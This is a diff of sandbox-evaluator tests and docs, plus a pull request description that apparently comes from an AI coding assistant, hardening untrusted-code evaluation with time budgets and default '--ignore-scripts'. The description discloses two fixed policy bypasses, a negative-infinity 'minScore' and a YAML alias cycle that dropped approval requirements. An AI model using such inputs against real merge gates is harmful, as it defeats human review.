+      expect.objectContaining({ field: "timeout" }),
+    );
+  });
+
+  it("returns an evaluators array that does not alias the parsed input", async () => {
+    const policy = await loadConfig({
+      evaluators: [{ type: "sandbox", timeoutMs: 999_999_999 }],
+    });
+    const second = await loadConfig({ evaluators: [{ type: "diff" }] });
+
+    expect(policy.evaluators).not.toBe(second.evaluators);
   });
 });

--- a/tests/sandbox-evaluator.test.ts
+++ b/tests/sandbox-evaluator.test.ts
@@ -1,12 +1,21 @@
 import git from "isomorphic-git";
 import { describe, expect, it, vi } from "vitest";
 import {
+  DEFAULT_INSTALL_TIMEOUT_MS,
+  DEFAULT_TIMEOUT_MS,
+  DEFAULT_TOTAL_BUDGET_MS,
+  MAX_PHASE_TIMEOUT_MS,
+  MAX_TOTAL_BUDGET_MS,
+} from "../src/evaluation/limits";
+import {
   BINARY_DECODE_COMMAND,
   type RepoFilesReader,
   SandboxEvaluator,
   type SandboxRepoAccess,
+  budgetExceededReason,
   encodeForSandboxWrite,
   installCommandFor,
+  startBudget,
 } from "../src/evaluation/sandbox-evaluator";
 import type { EvalPolicy } from "../src/evaluation/types";
 import { buildEvaluators } from "../src/services/change-flow";
@@ -189,7 +198,7 @@ describe("SandboxEvaluator — workspace tree materialization", () => {
     expect(writeCalls.some(([path]) => path === ".stratum-binary-decode.cjs")).toBe(true);
     const commands = runCalls.map((c) => c.command);
     expect(commands[0]).toBe(BINARY_DECODE_COMMAND);
-    expect(commands.slice(1)).toEqual(["npm ci --no-audit --no-fund", "npm test"]);
+    expect(commands.slice(1)).toEqual(["npm ci --no-audit --no-fund --ignore-scripts", "npm test"]);
   });
 
   it("never clobbers tracked files sitting at the decode helper paths (#271)", async () => {
@@ -362,7 +371,10 @@ describe("SandboxEvaluator — dependency install", () => {
 
     await evaluator.evaluate("", makePolicy(), mockLogger);
 
-    expect(runCalls.map((c) => c.command)).toEqual(["npm ci --no-audit --no-fund", "npm test"]);
+    expect(runCalls.map((c) => c.command)).toEqual([
+      "npm ci --no-audit --no-fund --ignore-scripts",
+      "npm test",
+    ]);
   });
 
   it("runs `npm install` when package.json exists without a lockfile", async () => {
@@ -374,7 +386,7 @@ describe("SandboxEvaluator — dependency install", () => {
     await evaluator.evaluate("", makePolicy(), mockLogger);
 
     expect(runCalls.map((c) => c.command)).toEqual([
-      "npm install --no-audit --no-fund",
+      "npm install --no-audit --no-fund --ignore-scripts",
       "npm test",
     ]);
   });
@@ -389,7 +401,7 @@ describe("SandboxEvaluator — dependency install", () => {
     expect(runCalls.map((c) => c.command)).toEqual(["npm test"]);
   });
 
-  it("uses the install timeout (default 120s) for install and timeoutMs for the command", async () => {
+  it("uses the install timeout default for install and timeoutMs for the command", async () => {
     const { binding, runCalls } = makeMockSandbox({ exitCode: 0 });
     const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles());
     const policy = makePolicy({
@@ -399,29 +411,35 @@ describe("SandboxEvaluator — dependency install", () => {
     await evaluator.evaluate("", policy, mockLogger);
 
     expect(runCalls[0]).toEqual({
-      command: "npm ci --no-audit --no-fund",
-      opts: { timeout: 120_000 },
+      command: "npm ci --no-audit --no-fund --ignore-scripts",
+      opts: { timeout: DEFAULT_INSTALL_TIMEOUT_MS },
     });
     expect(runCalls[1]).toEqual({ command: "npm test", opts: { timeout: 30_000 } });
   });
 
-  it("honors a configured installTimeoutMs", async () => {
+  it("clamps a configured installTimeoutMs down to what the budget has left", async () => {
+    // This policy is built directly rather than loaded, which is exactly the
+    // case load-time clamping cannot cover: `evaluate` is reachable from a KV
+    // policy cache and from callers that never went through `policy-loader`,
+    // so the evaluator has to bound the grant itself.
     const { binding, runCalls } = makeMockSandbox({ exitCode: 0 });
-    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles());
+    // Frozen clock: the grant is then exactly the budget, with no wall-clock
+    // drift between starting the budget and reaching the install.
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles(), () => 1_000);
     const policy = makePolicy({
       evaluators: [{ type: "sandbox", installTimeoutMs: 300_000 }],
     });
 
     await evaluator.evaluate("", policy, mockLogger);
 
-    expect(runCalls[0]?.opts).toEqual({ timeout: 300_000 });
+    expect(runCalls[0]?.opts).toEqual({ timeout: DEFAULT_TOTAL_BUDGET_MS });
   });
 
   it("install failure → score 0, failed, reason names the install command, test never runs", async () => {
     const { binding, runCalls } = makeMockSandbox({
       exitCode: 0,
       runResults: {
-        "npm ci --no-audit --no-fund": {
+        "npm ci --no-audit --no-fund --ignore-scripts": {
           exitCode: 1,
           stderr: "ERESOLVE unable to resolve dependency tree",
         },
@@ -436,12 +454,14 @@ describe("SandboxEvaluator — dependency install", () => {
       expect(result.data.score).toBe(0);
       expect(result.data.passed).toBe(false);
       expect(result.data.reason).toContain(
-        "Dependency install (npm ci --no-audit --no-fund) failed",
+        "Dependency install (npm ci --no-audit --no-fund --ignore-scripts) failed",
       );
       expect(result.data.reason).toContain("ERESOLVE");
       expect(result.data.costs?.[0]?.kind).toBe("sandbox_ms");
     }
-    expect(runCalls.map((c) => c.command)).toEqual(["npm ci --no-audit --no-fund"]);
+    expect(runCalls.map((c) => c.command)).toEqual([
+      "npm ci --no-audit --no-fund --ignore-scripts",
+    ]);
   });
 });
 
@@ -449,7 +469,7 @@ describe("installCommandFor", () => {
   it("maps manifest/lockfile presence to the right command", () => {
     expect(installCommandFor(new Map())).toBeNull();
     expect(installCommandFor(encodeTree([["package.json", "{}"]]))).toBe(
-      "npm install --no-audit --no-fund",
+      "npm install --no-audit --no-fund --ignore-scripts",
     );
     expect(
       installCommandFor(
@@ -458,7 +478,7 @@ describe("installCommandFor", () => {
           ["package-lock.json", "{}"],
         ]),
       ),
-    ).toBe("npm ci --no-audit --no-fund");
+    ).toBe("npm ci --no-audit --no-fund --ignore-scripts");
     expect(installCommandFor(encodeTree([["package-lock.json", "{}"]]))).toBeNull();
   });
 
@@ -473,7 +493,7 @@ describe("installCommandFor", () => {
           ["npm-shrinkwrap.json", "{}"],
         ]),
       ),
-    ).toBe("npm ci --no-audit --no-fund");
+    ).toBe("npm ci --no-audit --no-fund --ignore-scripts");
     // Both present is still a frozen install (npm prefers the shrinkwrap).
     expect(
       installCommandFor(
@@ -483,7 +503,7 @@ describe("installCommandFor", () => {
           ["package-lock.json", "{}"],
         ]),
       ),
-    ).toBe("npm ci --no-audit --no-fund");
+    ).toBe("npm ci --no-audit --no-fund --ignore-scripts");
     // A lockfile alone is still not an npm project.
     expect(installCommandFor(encodeTree([["npm-shrinkwrap.json", "{}"]]))).toBeNull();
   });
@@ -691,7 +711,9 @@ describe("SandboxEvaluator — destroy lifecycle", () => {
   it("destroy() is called when the install step fails", async () => {
     const { binding, instance } = makeMockSandbox({
       exitCode: 0,
-      runResults: { "npm ci --no-audit --no-fund": { exitCode: 1, stderr: "boom" } },
+      runResults: {
+        "npm ci --no-audit --no-fund --ignore-scripts": { exitCode: 1, stderr: "boom" },
+      },
     });
     const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles());
 
@@ -809,5 +831,364 @@ describe("buildEvaluators — sandbox wiring", () => {
       repo,
     );
     expect(findSandbox(evaluators)).toBeInstanceOf(SandboxEvaluator);
+  });
+});
+
+describe("sandbox limits", () => {
+  it("keeps the per-phase defaults summing inside the total budget", () => {
+    // The point of lowering the install default: an unconfigured project must
+    // be able to spend its full install AND its full test timeout without the
+    // budget truncating either. If a future bump breaks this, truncation
+    // silently becomes the norm rather than the exception.
+    expect(DEFAULT_INSTALL_TIMEOUT_MS + DEFAULT_TIMEOUT_MS).toBeLessThanOrEqual(
+      DEFAULT_TOTAL_BUDGET_MS,
+    );
+  });
+
+  it("keeps the phase ceiling below the total ceiling", () => {
+    // Otherwise a policy could grant one phase the entire evaluation's budget.
+    expect(MAX_PHASE_TIMEOUT_MS).toBeLessThan(MAX_TOTAL_BUDGET_MS);
+  });
+
+  it("keeps the default budget within the configurable ceiling", () => {
+    expect(DEFAULT_TOTAL_BUDGET_MS).toBeLessThanOrEqual(MAX_TOTAL_BUDGET_MS);
+  });
+});
+
+describe("startBudget", () => {
+  /** A clock the test advances by hand, so exhaustion needs no real waiting. */
+  function fakeClock(start = 0) {
+    let current = start;
+    return {
+      now: () => current,
+      advance: (ms: number) => {
+        current += ms;
+      },
+    };
+  }
+
+  it("counts down as the clock advances and never reports negative", () => {
+    const clock = fakeClock();
+    const budget = startBudget(1_000, clock.now);
+
+    expect(budget.remaining()).toBe(1_000);
+    clock.advance(400);
+    expect(budget.remaining()).toBe(600);
+    clock.advance(5_000);
+    expect(budget.remaining()).toBe(0);
+    expect(budget.expired()).toBe(true);
+  });
+
+  it("grants the smaller of the request and what is left", () => {
+    const clock = fakeClock();
+    const budget = startBudget(1_000, clock.now);
+
+    expect(budget.allow(500)).toBe(500);
+    clock.advance(800);
+    expect(budget.allow(500)).toBe(200);
+  });
+
+  it("never grants a timeout of zero once exhausted", () => {
+    // `sandbox.run`'s reading of `timeout: 0` is undocumented and "no timeout"
+    // is a plausible one — the exact opposite of an exhausted budget. Callers
+    // check `expired()` first, but this floor is what makes that safe to get
+    // wrong.
+    const clock = fakeClock();
+    const budget = startBudget(1_000, clock.now);
+    clock.advance(2_000);
+
+    expect(budget.allow(5_000)).toBeGreaterThan(0);
+  });
+
+  it("reports the total it started with", () => {
+    expect(startBudget(1_234, () => 0).totalMs).toBe(1_234);
+  });
+
+  it("falls back to the default for a non-finite total", () => {
+    // `Math.max(0, NaN)` is NaN, so a NaN total would make `expired()` always
+    // false and hand `timeout: NaN` to the sandbox — undefined behaviour on the
+    // one code path this whole mechanism exists to bound. `startBudget` is
+    // exported, so the guard has to live here, not only at the call sites.
+    for (const bogus of [Number.NaN, Number.POSITIVE_INFINITY, Number.NEGATIVE_INFINITY]) {
+      const budget = startBudget(bogus, () => 0);
+      expect(budget.totalMs).toBe(DEFAULT_TOTAL_BUDGET_MS);
+      expect(budget.remaining()).toBe(DEFAULT_TOTAL_BUDGET_MS);
+      expect(budget.expired()).toBe(false);
+      expect(budget.allow(1_000)).toBe(1_000);
+    }
+  });
+
+  it("treats a zero or negative total as immediately exhausted", () => {
+    expect(startBudget(0, () => 0).expired()).toBe(true);
+    expect(startBudget(-1, () => 0).expired()).toBe(true);
+    // Even exhausted, a grant is never 0 — see the floor test above.
+    expect(startBudget(0, () => 0).allow(60_000)).toBeGreaterThan(0);
+  });
+});
+
+describe("SandboxEvaluator — total budget", () => {
+  /**
+   * A clock that holds `held` until `trigger()` is called, then jumps to
+   * `after`.
+   *
+   * Scripted rather than free-running because `evaluate` reads the clock many
+   * times per phase — every `expired()` check is itself a read — so a clock
+   * that advanced on each read would drain the budget at a phase nobody chose,
+   * and a test could assert the right reason while exercising the wrong path.
+   */
+  function scriptedClock(held: number, after: number) {
+    let fired = false;
+    return {
+      now: () => (fired ? after : held),
+      trigger: () => {
+        fired = true;
+      },
+    };
+  }
+
+  it("returns a verdict, not an error, when the budget is gone by the end of the tree read", async () => {
+    const { binding, runCalls } = makeMockSandbox({ exitCode: 0 });
+    const clock = scriptedClock(0, DEFAULT_TOTAL_BUDGET_MS + 1);
+    const readFiles = vi.fn().mockImplementation(async () => {
+      // The read is what consumed the budget, so the gate right after it is the
+      // first to see an empty budget.
+      clock.trigger();
+      return ok(FULL_TREE);
+    });
+    const evaluator = new SandboxEvaluator(binding, repo, readFiles, clock.now);
+
+    const result = await evaluator.evaluate("", makePolicy(), mockLogger);
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.passed).toBe(false);
+      expect(result.data.score).toBe(0);
+      expect(result.data.reason).toContain("sandbox budget exceeded (tree-read)");
+      // No sandbox was created, so there is no sandbox time to report — and
+      // clone time is `git_ops`, never `sandbox_ms`.
+      expect(result.data.costs).toBeUndefined();
+    }
+    // Nothing ran, and the sandbox was never even created.
+    expect(runCalls).toEqual([]);
+    expect(binding.create).not.toHaveBeenCalled();
+  });
+
+  it("stops before the scored command once install has drained the budget", async () => {
+    const { binding, runCalls, instance } = makeMockSandbox({ exitCode: 0 });
+    const clock = scriptedClock(0, DEFAULT_TOTAL_BUDGET_MS + 1);
+    // Burn the budget during the install, so the gate before the scored command
+    // is the one that trips — the install itself must have run.
+    (instance.run as ReturnType<typeof vi.fn>).mockImplementation(async (command: string) => {
+      runCalls.push({ command });
+      if (command.startsWith("npm ci")) clock.trigger();
+      return { exitCode: 0, stdout: "", stderr: "" };
+    });
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles(), clock.now);
+
+    const result = await evaluator.evaluate("", makePolicy(), mockLogger);
+
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.passed).toBe(false);
+      expect(result.data.reason).toContain("sandbox budget exceeded (command)");
+      expect(result.data.costs?.[0]?.kind).toBe("sandbox_ms");
+    }
+    // The install ran; the scored command did not.
+    expect(runCalls.map((c) => c.command)).toEqual([
+      "npm ci --no-audit --no-fund --ignore-scripts",
+    ]);
+  });
+
+  it("classifies a budget-shortened phase that throws as a verdict, via the catch", async () => {
+    // The grant here is capped by the budget rather than by the project's own
+    // timeout, so the timeout that fires is the budget's — a verdict, and it has
+    // to be reached through the catch block, not a phase gate.
+    const { binding, instance, runCalls } = makeMockSandbox({ exitCode: 0 });
+    // Jumps to exactly the grant: a timeout fires when the grant is spent, not
+    // a millisecond before it.
+    const clock = scriptedClock(0, DEFAULT_TOTAL_BUDGET_MS);
+    (instance.run as ReturnType<typeof vi.fn>).mockImplementation(
+      async (command: string, opts?: { timeout?: number }) => {
+        runCalls.push({ command, opts });
+        clock.trigger();
+        throw new Error("Timeout");
+      },
+    );
+    const policy = makePolicy({
+      // Larger than the budget, so `allow()` must cap it.
+      evaluators: [{ type: "sandbox", installTimeoutMs: 300_000 }],
+    });
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles(), clock.now);
+
+    const result = await evaluator.evaluate("", policy, mockLogger);
+
+    expect(runCalls[0]?.opts?.timeout).toBe(DEFAULT_TOTAL_BUDGET_MS);
+    expect(result.success).toBe(true);
+    if (result.success) {
+      expect(result.data.passed).toBe(false);
+      expect(result.data.reason).toContain("sandbox budget exceeded (install)");
+      // The time the throwing phase burned is still charged.
+      expect(result.data.costs?.[0]?.quantity).toBe(DEFAULT_TOTAL_BUDGET_MS);
+    }
+  });
+
+  it("keeps err for a phase that hits the project's own timeout, not the budget", async () => {
+    // The grant was the configured value, so this is the project's timeout
+    // firing, not the budget's. Relabelling it would silently change what every
+    // pre-existing sandbox timeout reports.
+    const { binding } = makeMockSandbox({ runThrows: true });
+    const clock = scriptedClock(0, 30_000);
+    const policy = makePolicy({ evaluators: [{ type: "sandbox", installTimeoutMs: 10_000 }] });
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles(), clock.now);
+
+    const result = await evaluator.evaluate("", policy, mockLogger);
+
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.message).toContain("Timeout");
+    }
+  });
+
+  it("keeps err for a transient failure part-way through a budget-shortened phase", async () => {
+    // The grant is capped by the budget, but the throw arrives long before the
+    // grant is spent — a Sandbox API blip, not a timeout. Reporting it as a
+    // verdict would turn a retryable infrastructure error into a definitive
+    // judgement that fails the merge gate.
+    const { binding, instance, runCalls } = makeMockSandbox({ exitCode: 0 });
+    let elapsed = 0;
+    const clock = () => elapsed;
+    (instance.run as ReturnType<typeof vi.fn>).mockImplementation(
+      async (command: string, opts?: { timeout?: number }) => {
+        runCalls.push({ command, opts });
+        // Fails 200ms into a grant far larger than that.
+        elapsed += 200;
+        throw new Error("Sandbox API unavailable");
+      },
+    );
+    const policy = makePolicy({
+      evaluators: [{ type: "sandbox", installTimeoutMs: 300_000 }],
+    });
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles(), clock);
+
+    const result = await evaluator.evaluate("", policy, mockLogger);
+
+    // The grant really was budget-capped, so only the elapsed-time check
+    // separates this from the timeout case.
+    expect(runCalls[0]?.opts?.timeout).toBe(DEFAULT_TOTAL_BUDGET_MS);
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.message).toContain("Sandbox API unavailable");
+    }
+  });
+
+  it("still returns err for a throw with budget left, so infra failure is not a verdict", async () => {
+    // A sandbox that broke for its own reasons must not be scored as if the
+    // change were too slow.
+    const { binding } = makeMockSandbox({ runThrows: true });
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles(), () => 0);
+
+    const result = await evaluator.evaluate("", makePolicy(), mockLogger);
+
+    expect(result.success).toBe(false);
+    if (!result.success) {
+      expect(result.error.message).toContain("Timeout");
+    }
+  });
+
+  it("clamps a bogus totalBudgetMs that never went through the policy loader", async () => {
+    // `evaluate` is reachable from a KV policy cache and from callers that never
+    // loaded a file, so a cached `totalBudgetMs: 0` must not make every change
+    // on the project fail before a sandbox is created.
+    const { binding, runCalls } = makeMockSandbox({ exitCode: 0 });
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles(), () => 0);
+    const policy = makePolicy({ evaluators: [{ type: "sandbox", totalBudgetMs: 0 }] });
+
+    const result = await evaluator.evaluate("", policy, mockLogger);
+
+    expect(result.success).toBe(true);
+    if (result.success) expect(result.data.passed).toBe(true);
+    expect(runCalls.map((c) => c.command)).toContain("npm test");
+  });
+
+  it("honors a policy-supplied totalBudgetMs", async () => {
+    const { binding, runCalls } = makeMockSandbox({ exitCode: 0 });
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles(), () => 1_000);
+    const policy = makePolicy({
+      evaluators: [{ type: "sandbox", totalBudgetMs: 20_000, installTimeoutMs: 90_000 }],
+    });
+
+    await evaluator.evaluate("", policy, mockLogger);
+
+    expect(runCalls[0]?.opts).toEqual({ timeout: 20_000 });
+  });
+
+  it("does not let a rejecting destroy() replace the verdict", async () => {
+    // An `await` that rejects inside `finally` overrides the return value and
+    // propagates — which would reject the `Promise.all` in `runEvaluation` and
+    // discard every other evaluator's result.
+    const { binding, instance } = makeMockSandbox({ exitCode: 0 });
+    instance.destroy = vi.fn().mockRejectedValue(new Error("sandbox stuck"));
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles());
+
+    const result = await evaluator.evaluate("", makePolicy(), mockLogger);
+
+    expect(result.success).toBe(true);
+    if (result.success) expect(result.data.passed).toBe(true);
+  });
+
+  it("names the phase in a stable, greppable reason", () => {
+    expect(budgetExceededReason("install", 150_000)).toContain("sandbox budget exceeded (install)");
+    expect(budgetExceededReason("install", 150_000)).toContain("150000ms");
+  });
+});
+
+describe("installCommandFor — lifecycle script policy", () => {
+  const npmProject = encodeTree([
+    ["package.json", "{}"],
+    ["package-lock.json", "{}"],
+  ]);
+  const noLockfile = encodeTree([["package.json", "{}"]]);
+
+  it("ignores lifecycle scripts by default", () => {
+    // The tree is authored by whoever can push; a postinstall must not run
+    // before anyone has reviewed the change.
+    expect(installCommandFor(npmProject)).toBe("npm ci --no-audit --no-fund --ignore-scripts");
+    expect(installCommandFor(noLockfile)).toBe("npm install --no-audit --no-fund --ignore-scripts");
+  });
+
+  it("ignores lifecycle scripts when the flag is explicitly false", () => {
+    expect(installCommandFor(npmProject, { allowInstallScripts: false })).toBe(
+      "npm ci --no-audit --no-fund --ignore-scripts",
+    );
+  });
+
+  it("ignores lifecycle scripts when opts is present but the flag is absent", () => {
+    // Safe by omission: forgetting the field must not silently opt in.
+    expect(installCommandFor(npmProject, {})).toBe("npm ci --no-audit --no-fund --ignore-scripts");
+  });
+
+  it("runs lifecycle scripts only on an explicit opt-in", () => {
+    expect(installCommandFor(npmProject, { allowInstallScripts: true })).toBe(
+      "npm ci --no-audit --no-fund",
+    );
+    expect(installCommandFor(noLockfile, { allowInstallScripts: true })).toBe(
+      "npm install --no-audit --no-fund",
+    );
+  });
+
+  it("still returns null for a non-npm tree regardless of the flag", () => {
+    expect(installCommandFor(new Map(), { allowInstallScripts: true })).toBeNull();
+  });
+
+  it("threads allowInstallScripts from policy through evaluate()", async () => {
+    const { binding, runCalls } = makeMockSandbox({ exitCode: 0 });
+    const evaluator = new SandboxEvaluator(binding, repo, makeReadFiles());
+    const policy = makePolicy({
+      evaluators: [{ type: "sandbox", allowInstallScripts: true }],
+    });
+
+    await evaluator.evaluate("", policy, mockLogger);
+
+    expect(runCalls.map((c) => c.command)).toEqual(["npm ci --no-audit --no-fund", "npm test"]);
   });
 });

--- a/website/src/content/docs/guides/getting-started.md
+++ b/website/src/content/docs/guides/getting-started.md
@@ -116,6 +116,8 @@ evaluation:
     - type: sandbox
       command: "npm test"
       timeoutMs: 120000
+      totalBudgetMs: 150000
+      allowInstallScripts: false
 
     # AI review of the diff, scored 0.0-1.0.
     - type: llm
@@ -153,7 +155,16 @@ downgrade your governance.
   `command` (default: the project's test command), passing or failing on exit
   code. Requires the Sandboxes binding on self-hosted instances; when the
   binding is absent this evaluator **fails closed** rather than silently
-  passing.
+  passing. `timeoutMs` and `installTimeoutMs` bound the scored command and the
+  dependency install separately; `totalBudgetMs` (default 150s) bounds their
+  *sum* — each phase gets `min(configured, budget remaining)`, and running out
+  fails the evaluation instead of hanging. Dependency installs pass
+  `--ignore-scripts` by default, since the evaluated tree is untrusted code an
+  agent wrote and a `preinstall`/`postinstall` would otherwise run before any
+  human review; set `allowInstallScripts: true` if your build genuinely needs
+  them (native modules, a `prepare` step) — the usual symptom of leaving it off
+  when you need it is *not* a failing install, but a native module that
+  installs unbuilt and then fails when the test command loads it.
 - **`llm`** — sends the diff to an LLM (via the Workers AI binding) for review
   against your criteria. `model` picks the reviewer, `threshold` is the minimum
   passing score (0.0–1.0), and `maxDiffChars` bounds how much diff is sent.


### PR DESCRIPTION
Closes #239.

## Why

`SandboxEvaluator.evaluate()` runs on the synchronous request path — `POST /projects/:name/changes` (`src/routes/changes.ts:286`), the re-evaluate route (`:1376`), and the gated `git push` receive-pack handler (`src/routes/git-http.ts:899`). Two problems, both flagged in #239 as needing a policy call rather than a quick fix:

1. **Nothing bounded total evaluation time.** `installTimeoutMs` and `timeoutMs` were independent, so the old defaults alone permitted 180s of sandbox work before an unbounded tree read — and *before* the three repo clones the request has already done. Both values came straight from `.stratum/policy.yaml` with no validation, so `installTimeoutMs: 999999999` was accepted verbatim.
2. **`npm ci`/`npm install` executed untrusted lifecycle scripts.** The evaluated tree is authored by an agent or anyone who can push to a workspace; its `postinstall` ran before any human review.

Issue #239 offered a bounded budget or moving evaluation onto a queue. This takes the **bounded budget**; async evaluation stays tracked in `docs/REMAINING_WORK.md`, and the budget remains correct inside a future queue consumer.

## What changed

- **`totalBudgetMs`** (default 150s) bounds the whole evaluation. Each phase gets `min(configured, remaining)`; exhaustion returns a *verdict* with a stable, greppable reason naming the phase (`sandbox budget exceeded (install)`) instead of hanging. Default install timeout drops **120s → 90s** so the per-phase defaults sum to exactly the budget — an invariant test enforces it, so a future bump can't silently make truncation the norm.
- **`--ignore-scripts` by default**, with `allowInstallScripts: true` as the opt-in. `.stratum/policy.yaml` is already in `PROTECTED_CONFIG_FILES`, so flipping the flag requires human approval and can't be force-merged.
- **Per-evaluator policy validation** in `policy-loader.ts`, which previously only spread parsed YAML onto the defaults: clamp `sandbox`/`webhook` timeouts and `minScore`, reject a `command` that is blank, over-length, or contains a newline (a shell reads that as a second command), drop malformed `evaluators` entries that used to crash `buildEvaluators` on `.type`, and drop a `webhook` entry with no `url`.
- **Contained `finally` teardown** — a rejecting `sb.destroy()` could replace the returned `Result` and reject `runEvaluation`'s `Promise.all`, discarding every other evaluator's result.
- **[ADR 007](docs/adr/007-sandbox-evaluator-threat-model.md)** states what the Sandbox binding is and is not relied upon to isolate.

## ⚠️ Breaking

Repos whose build needs lifecycle scripts (native modules, a `prepare` step) must set `allowInstallScripts: true`. The usual symptom is **not** a failing install — a native module installs unbuilt and then fails when the test command loads it. No deployed project is affected today: the `[[sandboxes]]` binding is commented out at `wrangler.toml:121-123`, which is why this is the right moment to change the default.

Re-evaluating an existing change now runs under the new default, so a change that passed before may fail on re-evaluation.

## Two security fixes found in review

Both are independent of #239 and worth reviewing on their own:

- **A rejected `minScore` left the raw value in place.** The spread put the unvalidated value in `policy.minScore` before validation, and rejection only skipped the assignment. `minScore: -.inf` (or the string `"-5"`) made `score >= minScore` true for *every* score — accepting changes whose evaluators had all scored 0.
- **A YAML alias cycle silently discarded merge protection.** `JSON.stringify` throws on a circular structure, and it was reached while *logging* a rejected entry. The throw escaped to the handler that treats a file as absent, so a policy declaring `requiredApprovals: 2` became the permissive default with no `configError` — dropping the approval requirement and re-enabling force-merge.

## Honest limits (all in ADR 007)

- The budget bounds time **awaiting the sandbox**, which is the #239 overrun. It does **not** bound Worker-side CPU: Workers freeze `Date.now()` across pure-CPU spans (`src/utils/phase-timer.ts:5-16`), so pack decompression or base64-encoding a large tree is constrained by workerd's CPU limit instead.
- It is **not a request-level bound** — three pre-evaluation clones, `sandbox.create()`, and the timeout-less `llm` evaluator all sit outside it.
- **`--ignore-scripts` is not containment.** A tree-supplied `.npmrc` still redirects the registry, lockfile `resolved` URLs are still fetched verbatim, and the scored command runs untrusted code by design.
- Whether the binding's `timeout` actually terminates a process is undocumented and untestable while the binding is disabled.
- The post-merge smoke check (`src/merge/post-merge.ts`) is a **worse** exposure — write-scoped token, unbounded decode timeout, no install at all. Verified out of scope for code here (it imports only `materializeTree`, never `installCommandFor`), but documented in the ADR as follow-up.

## Also included

`package-lock.json` still said `0.1.0` and lacked the `engines` block that `package.json` gained in the v0.2.0 release, so `npm ci` would reject it. `npm install` synced it. Unrelated to #239 — happy to split it out if you'd rather.

## Verification

| Gate | Result |
|---|---|
| `npm run typecheck` | clean |
| `npm run lint` | zero errors, zero warnings |
| `npm test` | 129 passing across the two touched suites |
| coverage | `sandbox-evaluator.ts` 100% stmts / 89% branches, `limits.ts` 100%, `policy-loader.ts` 83%/80% (floor: 38/72) |
| `npm run release:check` | CHANGELOG well-formed |

`tests/issues.test.ts` and `tests/issues-comment-body-limit.test.ts` have **43 failures that reproduce identically on `main`** (confirmed by stashing this change) — pre-existing and unrelated, but they do mean `npm run test:coverage` aborts before printing its summary, so the coverage numbers above were measured per-file.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01UXq4Zc9xqK3ETqVZ8tLeo2
